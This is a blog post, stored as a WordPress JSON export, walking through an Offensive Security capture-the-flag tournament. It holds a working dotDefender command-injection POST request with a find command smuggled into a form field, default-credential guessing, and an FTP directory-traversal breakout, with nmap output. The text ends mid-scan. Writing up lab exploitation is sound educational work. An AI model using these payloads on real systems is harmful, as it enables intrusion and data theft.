{"id":3767,"date":"2010-05-10T23:20:00","date_gmt":"2010-05-10T21:20:00","guid":{"rendered":"http:\/\/www.corelan.be:8800\/?p=3767"},"modified":"2010-05-10T23:20:00","modified_gmt":"2010-05-10T21:20:00","slug":"offensive-security-hacking-tournament-how-strong-was-my-fu","status":"publish","type":"post","link":"https:\/\/www.corelan.be\/index.php\/2010\/05\/10\/offensive-security-hacking-tournament-how-strong-was-my-fu\/","title":{"rendered":"Offensive Security Hacking Tournament - How strong was my fu ?"},"content":{"rendered":"<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja1.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"margin: 0px 10px 0px 30px; display: inline; border: 0px;\" title=\"corelan_ninja\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/08\/corelan_ninja_thumb1.png\" alt=\"corelan_ninja\" width=\"106\" height=\"106\" align=\"right\" border=\"0\" \/><\/a> Hi,<\/p>\n<p>Over the last 2 days my friends from Corelan Team and I participated in a <a href=\"http:\/\/www.offensive-security.com\/backtrack\/how-strong-is-your-fu\/\">Hacking Tournament<\/a>, organized by Offensive Security.\u00a0 The primary goals of the tournament are :<\/p>\n<ul>\n<li>be the first one to grab \"secret\" information from a machine and post it to the Tournament Control Panel.<\/li>\n<li>document your findings and submit them to offsec.<\/li>\n<\/ul>\n<p>A lot of people registered for the tournament, so in order to avoid massive overload and bandwidth issues, a few days before the contest would start, all participants were told that they would have to pass a \"n00b\" filter, an \"easy\" phase1 challenge before we could actually VPN into the lab and start the real challenge.<\/p>\n<p>That's the scope.<\/p>\n<p>What follows below, are my personal notes I took during the contest. (and in case you were wondering : I registered as \"corelanc0d3r\" (<a href=\"mailto:corelanc0d3r@gmail.com\">corelanc0d3r@gmail.com<\/a>).<\/p>\n<blockquote><p>Before getting started, it's important to note that I'm not a pentester at all.\u00a0 I just took OffSec's\u00a0 \"Try Harder\" philosophy serious and tried to \"think out of the box\" instead of relying\/focussing on tools.\u00a0 Let's find out how far I got with this approach.\u00a0 Whether that was enough to break the challenges or not, will become clear soon.<\/p><\/blockquote>\n<p>Before the games started, I was hoping there would be a good amount of of Windows systems \/ Exploit building exercises (and not a lot of linux systems\/web based apps because I'm not really strong in those areas)<\/p>\n<p>You can see the scoreboard here and find out how good\/average\/bad I did :\u00a0 http:\/\/scoreboard.information-security-training.com\/scoreboard\/<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>The n00b filter<\/h3>\n<p>In the \"pre-challenge\" exercise (the challenge to filter participants and only allow the first 100 to connect), we were <em>kindly<\/em> requested to find a secret key and use it to register for the tournament Control Panel. Upon connecting to the machines hosting the \"secret key\", a simple login form was displayed : (http:\/\/www1.noob-filter.com or http:\/\/www2.noob-filter.com)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image41.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb41.png\" alt=\"image\" width=\"468\" height=\"387\" border=\"0\" \/><\/a><\/p>\n<p>The \"hints and tips\" section of the tournament stated that, in this phase of the tournament, the goal is to get the contents of a file called n00bSecret.txt and use the key inside this file to register for the real labs.\u00a0 Only the first 100 people to get this file\/extract the key from the file, would get a seat for the real tournament.<\/p>\n<blockquote><p>The game just started. It's saturday, 4pm, and I had invited some friends to come over later in the evening...\u00a0 well,\u00a0 in about an hour and a half to be more precise...\u00a0 I still needed to prep some stuff in the kitchen, so I decided to give it my best shot, but at the same time I also realized that if I wouldn't be able to get the secret key before my little party starts, I wouldn't probably make it in time (=be one of the first 100 people) either.\u00a0 Time pressure \ud83d\ude42 Let's see.<\/p><\/blockquote>\n<p>Back to the login page. Usually, when someone sees a login page during a pentest, there's a big chance they will try to \"log in\" or bypass the login.\u00a0 But in this case, the challenge is about getting a file.<\/p>\n<p>At the same time, the only thing we see is the login page. So my initial plan was not to start \"hammering\" on the login page, but rather to see if the form\/login page will give us some information that can be helpful to get access to the system (regardless of whether there is something behind the login page).<\/p>\n<p>Of course, if that wouldn't lead to anything useful, I could still do plan B : bruteforcing files and directories.<\/p>\n<p>I had a quick look at the source (fields, forms, etc) of the login page but there was not much to see.\u00a0 So my next step was to see what kind of error messages I could trigger when doing some simple tests.\u00a0 I decided to start with a simple sql injection attempt (basically just put a single quote in the Username field).<\/p>\n<p>That attempt redirected me to an error page generated by a plugin called dotDefender.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image39.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb39.png\" alt=\"image\" width=\"295\" height=\"179\" border=\"0\" \/><\/a><\/p>\n<p><em>Note : at the time of writing this documentation, it looks like the offsec crew changed the behaviour to block the display of the dotDefender error message :<\/em><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image411.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image41_thumb.png\" alt=\"image\" width=\"468\" height=\"183\" border=\"0\" \/><\/a><\/p>\n<p>Look at the page source of the page :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image110.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image1_thumb.png\" alt=\"image\" width=\"464\" height=\"230\" border=\"0\" \/><\/a><\/p>\n<p>=&gt; clear reference to \"Applicure\", which is the company that developed dotDefender :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image3.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb3.png\" alt=\"image\" width=\"352\" height=\"231\" border=\"0\" \/><\/a><\/p>\n<p>So from this point forward, it pretty easy to figure out that dotDefender is installed in the \/dotDefender folder. (Grab yourself a trial version, install it, done... or just Google for it)<\/p>\n<p>Anyways, by navigating into the dotDefender folder, I got a prompt for a username and password (basic authentication request)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image81.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image8_thumb.png\" alt=\"image\" width=\"480\" height=\"170\" border=\"0\" \/><\/a><\/p>\n<p>The login text says I should try \"admin\" as username.\u00a0 Let's try some obvious combinations things.\u00a0 admin\/admin, admin\/1234, admin\/password... bingo !\u00a0 the admin\/password combination worked fine.<\/p>\n<p>That brings us to vulnerability 1 : the username is admin, and the password is \"password\". The configuration of an easy-to-guess password (in combination with the fact that the admin account name was displayed on the login form), allows me to get access to the dotDefender Site Management page.\u00a0 This poor configuration would allow unauthorized people to change the dotDefender configuration, potentially allowing them to bypass input restrictions.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image5.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb5.png\" alt=\"image\" width=\"353\" height=\"305\" border=\"0\" \/><\/a><\/p>\n<p>That's nice, but it might not help me bypassing the login form, as the \"Stop dotDefender\" button doens't really seem to do anything.\u00a0 So I did a quick search for vulnerabilities in the dotDefender plugin, and I got this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image6.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb6.png\" alt=\"image\" width=\"275\" height=\"181\" border=\"0\" \/><\/a><\/p>\n<p><a title=\"http:\/\/www.exploit-db.com\/exploits\/10261\" href=\"http:\/\/www.exploit-db.com\/exploits\/10261\">http:\/\/www.exploit-db.com\/exploits\/10261<\/a><\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">An attack looks like:\n\n--------------------\/Request\/--------------------\nPOST \/dotDefender\/index.cgi HTTP\/1.1\nHost: 172.16.159.132\nUser-Agent: Mozilla\/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;\nrv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip,deflate\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\nReferer: https:\/\/172.16.159.132\/dotDefender\/index.cgi\nAuthorization: Basic YWRtaW46\nCache-Control: max-age=0\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 95\n\nsitename=dotdefeater&amp;deletesitename=dotdefeater;id;ls -al\n..\/;pwd;&amp;action=deletesite&amp;linenum=15\n\n--------------------\/Response\/--------------------<\/pre>\n<p>So it looks like we can use a specially crafted POST request to execute commands on the file system.<\/p>\n<p>If that is true, we can simply try to\u00a0 \"find\" the secret file on the filesystem and display it's contents :<\/p>\n<p>By hooking a web proxy between your browser and the server (or by using a custom Request editor such as Burp), we can craft\/manipulate a\u00a0 request and insert the evil payload, basically trying to find the location of the n00bSecret.txt file. The fields to alter are<\/p>\n<ul>\n<li>Host<\/li>\n<li>Referer<\/li>\n<li>Authorization<\/li>\n<li>and of course, the command to execute (\"find\" command in this case)<\/li>\n<\/ul>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">POST \/dotDefender\/index.cgi HTTP\/1.1\nHost: www1.noob-filter.com\nUser-Agent: Mozilla\/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko\/20100330 Fedora\/3.5.9-1.fc11 Firefox\/3.5.9\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,\/;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip,deflate\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\nReferer: http:\/\/www1.noob-filter.com\/dotdefender\/index.cgi\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nCache-Control: max-age=0\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 76\n\nsitename=dotdefeater&amp;deletesitename=dotdefeater;find \/ -name n00bSecret.txt;\n&amp;action=deletesite&amp;linenum=15<\/pre>\n<p>Wait until the find operation completes and review the results that are sent back by the server :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image7.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb7.png\" alt=\"image\" width=\"434\" height=\"271\" border=\"0\" \/><\/a><\/p>\n<p>Nice.<\/p>\n<p>I crafted another request, displaying the contents of the file :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image8.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb8.png\" alt=\"image\" width=\"447\" height=\"254\" border=\"0\" \/><\/a><\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image44.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image44_thumb.png\" alt=\"image\" width=\"452\" height=\"210\" border=\"0\" \/><\/a><\/p>\n<p>Game over... and my friends just arrived....\u00a0 Perfect timing \ud83d\ude42<\/p>\n<p>&nbsp;<\/p>\n<h4>Conclusions :<\/h4>\n<p>A number of critical vulnerabilities were found :<\/p>\n<ul>\n<li>Weak admin username\/password + display of admin username in the login form of dotDefender.<\/li>\n<li>Access to the dotDefender admin page from the internet.\u00a0 Access to admin pages should be restricted to trusted IP's only.<\/li>\n<li>Access to login forms\/admin pages in general should be at least protected via SSL<\/li>\n<li>Remote Command Execution vulnerability in the dotDefender plugin, allowing to steal sensitive information from the system (n00bSecret.txt was just an example. You can also get some other files from the system \ud83d\ude42<\/li>\n<\/ul>\n<p>\/etc\/passwd<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image10.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb10.png\" alt=\"image\" width=\"197\" height=\"147\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>After entering my key in the Scoreboard\/Control Panel login form, I got 25 points and was able to download the VPN files.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image48.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image48_thumb.png\" alt=\"image\" width=\"306\" height=\"162\" border=\"0\" \/><\/a><\/p>\n<p>(don't pay attention to the points - I made the screenshot while working on the last assignment)<\/p>\n<blockquote><p>So far so good, time to party with my friends. I set up the VPN connection and joined my wife and friends to have a little party.<\/p><\/blockquote>\n<p>Update : 11:30pm - friends went home, I'm a bit drunk... but ready to start with the real challenge !<\/p>\n<blockquote><p>Note : It took until sunday evening before the first 100 participants hacked their way through the n00bfilter...\u00a0 So I guess I didn't really had to hurry up after all \ud83d\ude42 Oh well...<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<h3>Target infrastructure<\/h3>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/CTFTarget.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"CTFTarget\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/CTFTarget_thumb.png\" alt=\"CTFTarget\" width=\"379\" height=\"514\" border=\"0\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Challenge 1 : killthen00b<\/h3>\n<p>After checking that my vpn connection to the offsec labs still worked (I was assigned IP 192.168.6.114) , I decided to start with challenge \"killthen00b\". The machines running this challenge were hosted at IP 192.168.6.70, .71 and .72<\/p>\n<blockquote><p>Part of the challenge is to deal with the process of reverts. Every 30 minutes, the machines get reverted to the previous snapshot, basically removing all of the changes that were applied to the system in the last 30 minutes.<\/p><\/blockquote>\n<p>A quick portscan (not a complete scan - I figured I could still run a full scan while looking at the obvious ports) on one of these 3 machines indicates the following \"Interesting ports\"<\/p>\n<p><strong>TCP Scan :<\/strong><\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">peter@krypt2:~$ nmap -A 192.168.6.70 -nvv\n\nStarting Nmap 5.21 ( http:<span style=\"color: #008000;\">\/\/nmap.org ) at 2010-05-09 12:24 CEST<\/span>\nNSE: Loaded 36 scripts for scanning.\nInitiating Ping Scan at 12:24\nScanning 192.168.6.70 [2 ports]\nCompleted Ping Scan at 12:24, 2.30s elapsed (1 total hosts)\nInitiating Connect Scan at 12:24\nScanning 192.168.6.70 [1000 ports]\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 21\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 993\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 995\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 80\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 143\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 587\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 25\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 110\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 3389\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 7025\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 465\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 7443\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 366\/tcp on 192.168.6.70\nDiscovered <span style=\"color: #0000ff;\">open<\/span> port 106\/tcp on 192.168.6.70\nCompleted Connect Scan at 12:24, 6.58s elapsed (1000 total ports)\nInitiating Service scan at 12:24\nScanning 14 services on 192.168.6.70\nCompleted Service scan at 12:24, 22.05s elapsed (14 services on 1 host)<\/pre>\n<p><strong>UDP Scan :<\/strong><\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">Nmap scan report for 192.168.6.70\nHost is up (0.052s latency).\nNot shown: 999 <span style=\"color: #0000ff;\">open<\/span>|filtered ports\nPORT    STATE SERVICE\n137\/udp <span style=\"color: #0000ff;\">open<\/span>  netbios-ns\nMAC Address: 00:50:56:BC:1C:69 (VMware)<\/pre>\n<p>Based on the MAC address, the machine is running as a guest inside VMWare.\u00a0 This may be interesting information for a pentester... If he can own the guest, he may be able to attack the host (VMWare) system as well.\u00a0\u00a0 Of course, the MAC addresses may be changed on purpose, but that is not relevant at this point.<\/p>\n<p>Let's have a look at the services and see if I can find some obvious issues.<\/p>\n<p>First of all, the tournament Hints\/Help page indicated that the FTP credentials are devil\/killthen00b.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image12.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/05\/image_thumb12.png\" alt=\"image\" width=\"326\" height=\"164\" border=\"0\" \/><\/a><\/p>\n<p>Since FTP is at the top of the list (see TCP Scan), let's find out if these credentials work :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">peter@krypt2:~$ ftp 192.168.6.70\nConnected to 192.168.6.70.\n220-Complete FTP server\n220 FTP Server v 3.3.0\nName (192.168.6.70:peter): devil\n331 Password required for devil\nPassword:\n230 User devil logged in.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; pwd\n257 \"<span style=\"color: #8b0000;\">\/MyDocuments<\/span>\" is current directory.\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Music\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Pictures\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Videos\n226 Transfer complete.\nftp&gt;<\/pre>\n<p>Ok, credentials work fine.\u00a0 But there's not a lot of information that can be found here. It looks like we are stuck in the My Documents folder<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">257 \"<span style=\"color: #8b0000;\">\/MyDocuments<\/span>\" is current directory.\nftp&gt; cd ..\n550 CWD: Operation not permitted.\nftp&gt;<\/pre>\n<p>&nbsp;<\/p>\n<p>The server banner returns \"Complete FTP server\".\u00a0 A quick search on exploit-db shows that this FTP server (if we can believe the banner of course) may suffer from a directory traversal vulnerability : <a title=\"http:\/\/www.exploit-db.com\/exploits\/11973\" href=\"http:\/\/www.exploit-db.com\/exploits\/11973\">http:\/\/www.exploit-db.com\/exploits\/11973<\/a>.<\/p>\n<p>So let's see if we can break out of the root using the directory traversal vulnerability on this ftp server :<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">ftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......<\/span>\".\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 04 00:10 AppData\ndr-xrwx--- 1 admin users              0 May 04 00:10 Application Data\ndr-xrwx--- 1 admin users              0 May 04 00:10 Cookies\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Desktop\ndr-xrwx--- 1 admin users              0 May 04 00:10 Documents\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Downloads\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Favorites\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Links\ndr-xrwx--- 1 admin users              0 May 04 00:10 Local Settings\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Music\ndr-xrwx--- 1 admin users              0 May 04 00:10 My Documents\ndr-xrwx--- 1 admin users              0 May 04 00:10 NetHood\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Pictures\ndr-xrwx--- 1 admin users              0 May 04 00:10 PrintHood\ndr-xrwx--- 1 admin users              0 May 04 00:10 Recent\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Saved Games\ndr-xrwx--- 1 admin users              0 May 04 00:10 SendTo\ndr-xrwx--- 1 admin users              0 May 04 00:10 Start Menu\ndr-xrwx--- 1 admin users              0 May 04 00:10 Templates\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Videos\n-r--rr---- 1 admin users         262144 May 04 00:10 NTUSER.DAT\n-r--rr---- 1 admin users         226304 May 04 00:10 ntuser.dat.LOG1\n-r--rr---- 1 admin users              0 May 04 00:10 ntuser.dat.LOG2\n-r--rr---- 1 admin users          65536 May 04 00:10 NTUSER.DAT{6cced2f1-...\n-r--rr---- 1 admin users         524288 May 04 00:10 NTUSER.DAT{6cced2f1-...\n-r--rr---- 1 admin users         524288 May 04 00:10 NTUSER.DAT{6cced2f1-...\n-r--rr---- 1 admin users             20 May 04 00:10 ntuser.ini\n226 Transfer complete.\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......<\/span>\".\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 03 23:05 Administrator\ndr-xrwx--- 1 admin users              0 Jul 13 2009 All Users\ndr-xrwx--- 1 admin users              0 Aug 31 2009 Default\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Default User\ndr-xrwx--- 1 admin users              0 May 04 00:06 devil\ndr-xrwx--- 1 admin users              0 May 04 00:08 ftp\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Public\ndr-xrwx--- 1 admin users              0 May 04 00:10 TEMP\n-r--rr---- 1 admin users            174 Jul 13 2009 desktop.ini\n226 Transfer complete.\nftp&gt; cd \\..\\..\\..\\\n250 Directory changed to \"<span style=\"color: #8b0000;\">\/MyDocuments\/......\/......\/......<\/span>\".\nftp&gt; ls\n200 PORT command successful.\n150 Opening ASCII mode <span style=\"color: #0000ff;\">data<\/span> connection for listing\ndr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin\ndr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings\ndr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs\ndr-xrwx--- 1 admin users              0 May 03 19:20 Program Files\ndr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData\ndr-xrwx--- 1 admin users              0 May 03 22:51 Python26\ndr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery\ndr-xrwx--- 1 admin users              0 May 06 05:01 surgemail\ndr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information\ndr-xrwx--- 1 admin users              0 May 04 00:10 Users\ndr-xrwx--- 1 admin users              0 May 03 21:28 Windows\n-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat\n-r--rr---- 1 admin users             10 Jun 10 2009 config.<span style=\"color: #0000ff;\">sys<\/span>\n-r--rr---- 1 admin users     2043449344 May 03 23:14 pagefile.<span style=\"color: #0000ff;\">sys<\/span>\n-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe\n226 Transfer complete.\nftp&gt;<\/pre>\n<p>Nice, so we have access to the entire disk.\u00a0\u00a0 I started downloading most of the files, to see if I would need to analyze them later on.\u00a0 (After all, files such as NTUSER.dat.* may contain sensitive information)<\/p>\n<p>Before continuing, let's look at the other services. Perhaps we can use the fact that we can access the filesystem to get some information about the configuration of these services.<\/p>\n<pre style=\"background-color: #e2e2e2; min-height: 40px; width: 600px; overflow: auto; border: #808080 1px solid; padding: 5px;\">Nmap scan report for 192.168.6.70\nHost is up (0.13s latency).\nScanned at 2010-05-09 12:24:15 CEST for 37s\nNot shown: 986 filtered ports\nPORT     STATE SERVICE       VERSION\n21\/tcp   <span style=\"color: #0000ff;\">open<\/span>  ftp\n|_ftp-anon: Anonymous FTP login allowed\n25\/tcp   <span style=\"color: #0000ff;\">open<\/span>  smtp          Surgemail smtpd 3.8k4-4\n|_smtp-commands: EHLO killthen00b. Hello example.org (192.168.6.114), AUTH PLAIN LOGIN, ETRN, X-ID 6b696c6c7468656e30306231323732393539363939, SIZE 20971520, HELP\n80\/tcp   <span style=\"color: #0000ff;\">open<\/span>  http          DNews Web Based Manager\n|_http-favicon: Unknown favicon MD5: 803DA8BF442FFF23072386E2B5EF2928\n|_html-title: SurgeMail Welcome Page\n106\/tcp  <span style=\"color: #0000ff;\">open<\/span>  pop3pw        Qualcomm poppassd (Maximum users connected)\n110\/tcp  <span style=\"color: #0000ff;\">open<\/span>  pop3          SurgeMail pop3d 3.8k4-4\n143\/tcp  <span style=\"color: #0000ff;\">open<\/span>  imap          SurgeMail imapd 3.8k4-4\n|_imap-capabilities: UIDPLUS SURGEMAIL IMAP4REV1 IMAP4 XFLDDATA IDLE NAMESPACE QUOTA\n366\/tcp  <span style=\"color: #0000ff;\">open<\/span>  smtp          Surgemail smtpd 3.8k4-4\n465\/tcp  <span style=\"color: #0000ff;\">open<\/span>  ssl\/smtp      Surgemail smtpd 3.8k4-4\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n587\/tcp  <span style=\"color: #0000ff;\">open<\/span>  smtp          Surgemail smtpd 3.8k4-4\n993\/tcp  <span style=\"color: #0000ff;\">open<\/span>  ssl\/imap      SurgeMail imapd 3.8k4-4\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_imap-capabilities: UIDPLUS SURGEMAIL IMAP4REV1 IMAP4 ...\n995\/tcp  <span style=\"color: #0000ff;\">open<\/span>  ssl\/pop3      SurgeMail pop3d 3.8k4-4\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_pop3-capabilities: USER SURGEMAIL UIDL TOP OK(K Capability list follows)\n3389\/tcp <span style=\"color: #0000ff;\">open<\/span>  microsoft-rdp Microsoft Terminal Service\n7025\/tcp <span style=\"color: #0000ff;\">open<\/span>  ssl\/http      DNews Web Based Manager\n| sslv2: server still supports SSLv2\n|       SSL2_DES_192_EDE3_CBC_WITH_MD5\n|       SSL2_IDEA_128_CBC_WITH_MD5\n|       SSL2_RC2_CBC_128_CBC_WITH_MD5\n|       SSL2_RC4_128_WITH_MD5\n|       SSL2_DES_64_CBC_WITH_MD5\n|_      SSL2_RC4_128_EXPORT40_WITH_MD5\n|_html-title: SurgeMail (killthen00b)\n|_http-favicon: Unknown favicon MD5: 